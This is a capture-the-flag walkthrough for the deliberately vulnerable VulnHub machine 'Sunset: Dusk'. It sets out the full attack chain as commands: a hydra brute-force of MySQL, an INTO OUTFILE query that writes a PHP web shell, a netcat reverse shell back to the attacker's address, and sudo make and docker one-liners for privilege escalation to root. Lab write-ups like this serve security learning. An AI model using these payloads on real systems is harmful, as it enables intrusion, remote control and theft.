Sunset: Dusk Walkthrough

on

Hello Everyone, let's begin

ctf link : https://www.vulnhub.com/entry/sunset-dusk,404/

download link : https://download.vulnhub.com/sunset/dusk.7z

I opened it with Virtualbox in bridged network with inteface named vmnet8 (172.16.59.0/24).

CTF level : Beginner to intermediate

Vulnerabilities to exploit : Sudo with no password

Technique and tools : Nmap, hydra, Firefox, ssh, mysql, netcat, GTFOBinsdefault_users.txtdefault_pass.txtMr Jamie Bowman

Total flags: 2

I found IP using arp-scan
sudo arp-scan --interface vmnet8 --local

I found IP of the ctf machine 172.16.59.148
I started scanning well-known 1000 ports and banner grabbing using nmap
sudo nmap -sSV 172.16.59.148

I tried nmap aggressive and vuln script scan, nikto, dirb and site mapping using Burp. But they were not useful

I saw directory listing at http://172.16.59.148:8080 in firefox.


I started bruteforcing mysql using wordlist from fuzz-db default_users.txt default_pass.txt

Note : If ctf machine blocks your mysql login request then restart the ctf machine.
hydra -vV -t 1 -f -L default_users.txt -P default_pass.txt 172.16.59.148 mysql
And It successfully found username and password
Service : Mysql
Login : root
Password: password

I logged into Mysql using the credential and wrote a php shell to same dirctory which is being fetched at 8080. I took help from here : Mr Jamie Bowman
SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "/var/tmp/shell1.php";

I added a shell1.php in /var/tmp where cmd get parameter will run command in terminal.
To see if my file got added or not, I refreshed http://172.16.59.148:8080
Without having second thought in my mind, I went for netcat reverse connection.
I started netcat listening on my system.
nc -lvp 1234


And then I went to browser and wrote command to send connection request with bash shell
172.16.59.148:8080/shell1.php?cmd=nc -np 172.16.59.1 1234 -e /bin/bash

I got the shell. But it wasn't. And to make it interactive. I use python
python -c 'import pty;pty.spawn("/bin/bash");'

I can look for my first flag. But I prefer escalating privilege first.
sudo -l
This sudo command showed me permission to execute few files as user 'dusk' with no password.

/usr/bin/ping, /usr/bin/make, /usr/bin/sl
I started looking for these tools to bring back another shell at GTFOBins. I found for make.
sudo -u dusk make --eval=$'x:\n\t-'"/bin/bash" 

I can see this user belong to (docker) group. I again started looking into GTFOBins for docker and I found one.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Finally, I'm root. Now it's time to search flags. I found flag at two points.
cat /home/dusk/user.txt
cat /root/root.txt



Comments

Post a Comment